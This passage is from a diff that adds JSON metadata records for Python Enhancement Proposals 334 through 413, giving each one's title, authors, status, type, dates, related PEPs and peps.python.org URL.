"requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0334/" + }, + "335": { + "number": 335, + "title": "Overloadable Boolean Operators", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Aug-2004", + "python_version": "3.3", + "post_history": "05-Sep-2004, 30-Sep-2011, 25-Oct-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0335/" + }, + "336": { + "number": 336, + "title": "Make None Callable", + "authors": "Andrew McClelland", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Oct-2004", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0336/" + }, + "337": { + "number": 337, + "title": "Logging Usage in the Standard Library", + "authors": "Michael P. Dubner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "02-Oct-2004", + "python_version": "2.5", + "post_history": "10-Nov-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0337/" + }, + "338": { + "number": 338, + "title": "Executing modules as scripts", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2004", + "python_version": "2.5", + "post_history": "08-Nov-2004, 11-Feb-2006, 12-Feb-2006, 18-Feb-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0338/" + }, + "339": { + "number": 339, + "title": "Design of the CPython Compiler", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "02-Feb-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0339/" + }, + "340": { + "number": 340, + "title": "Anonymous Block Statements", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0340/" + }, + "341": { + "number": 341, + "title": "Unifying try-except and try-finally", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0341/" + }, + "342": { + "number": 342, + "title": "Coroutines via Enhanced Generators", + "authors": "Guido van Rossum, Phillip J. Eby", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0342/" + }, + "343": { + "number": 343, + "title": "The \"with\" Statement", + "authors": "Guido van Rossum, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-May-2005", + "python_version": "2.5", + "post_history": "02-Jun-2005, 16-Oct-2005, 29-Oct-2005, 23-Apr-2006, 01-May-2006, 30-Jul-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0343/" + }, + "344": { + "number": 344, + "title": "Exception Chaining and Embedded Tracebacks", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "12-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0344/" + }, + "345": { + "number": 345, + "title": "Metadata for Python Software Packages 1.2", + "authors": "Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "28-Apr-2005", + "python_version": "2.7", + "post_history": "`22-Dec-2009 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/MKHXVV746H7ZDFN62Z72VNAX6KIRXNRO/", + "requires": null, + "replaces": "314", + "superseded_by": "566", + "url": "https://peps.python.org/pep-0345/" + }, + "346": { + "number": 346, + "title": "User Defined (\"``with``\") Statements", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0346/" + }, + "347": { + "number": 347, + "title": "Migrating the Python CVS to Subversion", + "authors": "Martin von L\u00f6wis", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Process", + "topic": "", + "created": "14-Jul-2004", + "python_version": null, + "post_history": "14-Jul-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0347/" + }, + "348": { + "number": 348, + "title": "Exception Reorganization for Python 3.0", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Jul-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0348/" + }, + "349": { + "number": 349, + "title": "Allow str() to return unicode strings", + "authors": "Neil Schemenauer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "02-Aug-2005", + "python_version": "2.5", + "post_history": "06-Aug-2005", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/M2Y3PUFLAE23NPRJPVBYF6P5LW5LVN6F/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0349/" + }, + "350": { + "number": 350, + "title": "Codetags", + "authors": "Micah Elliott", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "27-Jun-2005", + "python_version": null, + "post_history": "10-Aug-2005, 26-Sep-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0350/" + }, + "351": { + "number": 351, + "title": "The freeze protocol", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Apr-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0351/" + }, + "352": { + "number": 352, + "title": "Required Superclass for Exceptions", + "authors": "Brett Cannon, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Oct-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0352/" + }, + "353": { + "number": 353, + "title": "Using ssize_t as the index type", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Dec-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0353/" + }, + "354": { + "number": 354, + "title": "Enumerations in Python", + "authors": "Ben Finney", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2005", + "python_version": "2.6", + "post_history": "20-Dec-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "435", + "url": "https://peps.python.org/pep-0354/" + }, + "355": { + "number": 355, + "title": "Path - Object oriented filesystem paths", + "authors": "Bj\u00f6rn Lindqvist", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Jan-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0355/" + }, + "356": { + "number": 356, + "title": "Python 2.5 Release Schedule", + "authors": "Neal Norwitz, Guido van Rossum, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "07-Feb-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0356/" + }, + "357": { + "number": 357, + "title": "Allowing Any Object to be Used for Slicing", + "authors": "Travis Oliphant", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0357/" + }, + "358": { + "number": 358, + "title": "The \"bytes\" Object", + "authors": "Neil Schemenauer, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2006", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0358/" + }, + "359": { + "number": 359, + "title": "The \"make\" Statement", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Apr-2006", + "python_version": "2.6", + "post_history": "05-Apr-2006, 06-Apr-2006, 13-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0359/" + }, + "360": { + "number": 360, + "title": "Externally Maintained Packages", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "30-May-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0360/" + }, + "361": { + "number": 361, + "title": "Python 2.6 and 3.0 Release Schedule", + "authors": "Neal Norwitz, Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "29-Jun-2006", + "python_version": "2.6, 3.0", + "post_history": "17-Mar-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0361/" + }, + "362": { + "number": 362, + "title": "Function Signature Object", + "authors": "Brett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Aug-2006", + "python_version": "3.3", + "post_history": "04-Jun-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-June/120682.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0362/" + }, + "363": { + "number": 363, + "title": "Syntax For Dynamic Attribute Access", + "authors": "Ben North", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Jan-2007", + "python_version": null, + "post_history": "12-Feb-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0363/" + }, + "364": { + "number": 364, + "title": "Transitioning to the Py3K Standard Library", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2007", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0364/" + }, + "365": { + "number": 365, + "title": "Adding the pkg_resources module", + "authors": "Phillip J. Eby", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Apr-2007", + "python_version": null, + "post_history": "30-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0365/" + }, + "366": { + "number": 366, + "title": "Main module explicit relative imports", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "2.6, 3.0", + "post_history": "01-May-2007, 04-Jul-2007, 07-Jul-2007, 23-Nov-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0366/" + }, + "367": { + "number": 367, + "title": "New Super", + "authors": "Calvin Spealman, Tim Delaney", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": "2.6", + "post_history": "`28-Apr-2007 `__, `29-Apr-2007 `__, `29-Apr-2007 `__, `14-May-2007 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0367/" + }, + "368": { + "number": 368, + "title": "Standard image protocol and class", + "authors": "Lino Mastrodomenico", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-Jun-2007", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0368/" + }, + "369": { + "number": 369, + "title": "Post import hooks", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "02-Jan-2008", + "python_version": "2.6, 3.0", + "post_history": "02-Dec-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0369/" + }, + "370": { + "number": 370, + "title": "Per user site-packages directory", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2008", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0370/" + }, + "371": { + "number": 371, + "title": "Addition of the multiprocessing package to the standard library", + "authors": "Jesse Noller, Richard Oudkerk", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-May-2008", + "python_version": "2.6, 3.0", + "post_history": "`03-Jun-2008 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0371/" + }, + "372": { + "number": 372, + "title": "Adding an ordered dictionary to collections", + "authors": "Armin Ronacher, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jun-2008", + "python_version": "2.7, 3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0372/" + }, + "373": { + "number": 373, + "title": "Python 2.7 Release Schedule", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "03-Nov-2008", + "python_version": "2.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0373/" + }, + "374": { + "number": 374, + "title": "Choosing a distributed VCS for the Python project", + "authors": "Brett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "07-Nov-2008", + "python_version": null, + "post_history": "07-Nov-2008, 22-Jan-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0374/" + }, + "375": { + "number": 375, + "title": "Python 3.1 Release Schedule", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "08-Feb-2009", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0375/" + }, + "376": { + "number": 376, + "title": "Database of Installed Python Distributions", + "authors": "Tarek Ziad\u00e9", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "22-Feb-2009", + "python_version": "2.7, 3.2", + "post_history": "`22-Jun-2009 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0376/" + }, + "377": { + "number": 377, + "title": "Allow __enter__() methods to skip the statement body", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2009", + "python_version": "2.7, 3.1", + "post_history": "08-Mar-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0377/" + }, + "378": { + "number": 378, + "title": "Format Specifier for Thousands Separator", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Mar-2009", + "python_version": "2.7, 3.1", + "post_history": "12-Mar-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0378/" + }, + "379": { + "number": 379, + "title": "Adding an Assignment Expression", + "authors": "Jervis Whitley", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "14-Mar-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0379/" + }, + "380": { + "number": 380, + "title": "Syntax for Delegating to a Subgenerator", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Feb-2009", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-June/112010.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0380/" + }, + "381": { + "number": 381, + "title": "Mirroring infrastructure for PyPI", + "authors": "Tarek Ziad\u00e9, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Mar-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0381/" + }, + "382": { + "number": 382, + "title": "Namespace Packages", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "02-Apr-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0382/" + }, + "383": { + "number": 383, + "title": "Non-decodable Bytes in System Character Interfaces", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2009", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0383/" + }, + "384": { + "number": 384, + "title": "Defining a Stable ABI", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "17-May-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0384/" + }, + "385": { + "number": 385, + "title": "Migrating from Subversion to Mercurial", + "authors": "Dirkjan Ochtman, Antoine Pitrou, Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "25-May-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0385/" + }, + "386": { + "number": 386, + "title": "Changing the version comparison module in Distutils", + "authors": "Tarek Ziad\u00e9", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Jun-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "440", + "url": "https://peps.python.org/pep-0386/" + }, + "387": { + "number": 387, + "title": "Backwards Compatibility Policy", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "18-Jun-2009", + "python_version": null, + "post_history": "`19-Jun-2009 `__, `12-Jun-2020 `__, `19-Dec-2022 `__, `16-Jun-2023 `__", + "resolution": null, + "requires": null, + "replaces": "291", + "superseded_by": null, + "url": "https://peps.python.org/pep-0387/" + }, + "389": { + "number": 389, + "title": "argparse - New Command Line Parsing Module", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Sep-2009", + "python_version": "2.7, 3.2", + "post_history": "27-Sep-2009, 24-Oct-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0389/" + }, + "390": { + "number": 390, + "title": "Static metadata for Distutils", + "authors": "Tarek Ziad\u00e9", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "10-Oct-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-April/020597.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0390/" + }, + "391": { + "number": 391, + "title": "Dictionary-Based Configuration For Logging", + "authors": "Vinay Sajip", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Oct-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0391/" + }, + "392": { + "number": 392, + "title": "Python 3.2 Release Schedule", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "30-Dec-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0392/" + }, + "393": { + "number": 393, + "title": "Flexible String Representation", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Jan-2010", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0393/" + }, + "394": { + "number": 394, + "title": "The \"python\" Command on Unix-Like Systems", + "authors": "Kerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hron\u010dok, Carol Willing", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "02-Mar-2011", + "python_version": null, + "post_history": "04-Mar-2011, 20-Jul-2011, 16-Feb-2012, 30-Sep-2014, 28-Apr-2018, 26-Jun-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116594.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0394/" + }, + "395": { + "number": 395, + "title": "Qualified Names for Modules", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Mar-2011", + "python_version": "3.4", + "post_history": "05-Mar-2011, 19-Nov-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0395/" + }, + "396": { + "number": 396, + "title": "Module Version Numbers", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "packaging", + "created": "16-Mar-2011", + "python_version": null, + "post_history": "05-Apr-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0396/" + }, + "397": { + "number": 397, + "title": "Python launcher for Windows", + "authors": "Mark Hammond, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Mar-2011", + "python_version": "3.3", + "post_history": "21-Jul-2011, 17-May-2011, 15-Mar-2011", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-June/120505.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0397/" + }, + "398": { + "number": 398, + "title": "Python 3.3 Release Schedule", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "23-Mar-2011", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0398/" + }, + "399": { + "number": 399, + "title": "Pure Python/C Accelerator Module Compatibility Requirements", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "04-Apr-2011", + "python_version": "3.3", + "post_history": "04-Apr-2011, 12-Apr-2011, 17-Jul-2011, 15-Aug-2011, 01-Jan-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0399/" + }, + "400": { + "number": 400, + "title": "Deprecate codecs.StreamReader and codecs.StreamWriter", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-May-2011", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0400/" + }, + "401": { + "number": 401, + "title": "BDFL Retirement", + "authors": "Barry Warsaw, Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "01-Apr-2009", + "python_version": null, + "post_history": "01-Apr-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0401/" + }, + "402": { + "number": 402, + "title": "Simplified Package Layout and Partitioning", + "authors": "Phillip J. Eby", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Jul-2011", + "python_version": "3.3", + "post_history": "20-Jul-2011", + "resolution": null, + "requires": null, + "replaces": "382", + "superseded_by": null, + "url": "https://peps.python.org/pep-0402/" + }, + "403": { + "number": 403, + "title": "General purpose decorator clause (aka \"@in\" clause)", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "13-Oct-2011", + "python_version": "3.4", + "post_history": "13-Oct-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0403/" + }, + "404": { + "number": 404, + "title": "Python 2.8 Un-release Schedule", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "09-Nov-2011", + "python_version": "2.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0404/" + }, + "405": { + "number": 405, + "title": "Python Virtual Environments", + "authors": "Carl Meyer", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "13-Jun-2011", + "python_version": "3.3", + "post_history": "24-Oct-2011, 28-Oct-2011, 06-Mar-2012, 24-May-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119668.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0405/" + }, + "406": { + "number": 406, + "title": "Improved Encapsulation of Import State", + "authors": "Alyssa Coghlan, Greg Slodkowicz", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Jul-2011", + "python_version": "3.4", + "post_history": "31-Jul-2011, 13-Nov-2011, 04-Dec-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0406/" + }, + "407": { + "number": 407, + "title": "New release cycle and introducing long-term support versions", + "authors": "Antoine Pitrou, Georg Brandl, Barry Warsaw", + "discussions_to": null, + "status": "Deferred", + "type": "Process", + "topic": "", + "created": "12-Jan-2012", + "python_version": null, + "post_history": "17-Jan-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0407/" + }, + "408": { + "number": 408, + "title": "Standard library __preview__ package", + "authors": "Alyssa Coghlan, Eli Bendersky", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "07-Jan-2012", + "python_version": "3.3", + "post_history": "27-Jan-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-January/115962.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0408/" + }, + "409": { + "number": 409, + "title": "Suppressing exception context", + "authors": "Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2012", + "python_version": "3.3", + "post_history": "30-Aug-2002, 01-Feb-2012, 03-Feb-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116136.html", + "requires": null, + "replaces": null, + "superseded_by": "415", + "url": "https://peps.python.org/pep-0409/" + }, + "410": { + "number": 410, + "title": "Use decimal.Decimal type for timestamps", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116837.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0410/" + }, + "411": { + "number": 411, + "title": "Provisional packages in the Python standard library", + "authors": "Alyssa Coghlan, Eli Bendersky", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "10-Feb-2012", + "python_version": "3.3", + "post_history": "10-Feb-2012, 24-Mar-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0411/" + }, + "412": { + "number": 412, + "title": "Key-Sharing Dictionary", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Feb-2012", + "python_version": "3.3", + "post_history": "08-Feb-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0412/" + }, + "413": { + "number": 413, + "title": "Faster evolution of the Python Standard Library", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "24-Feb-2012", + "python_version": null, 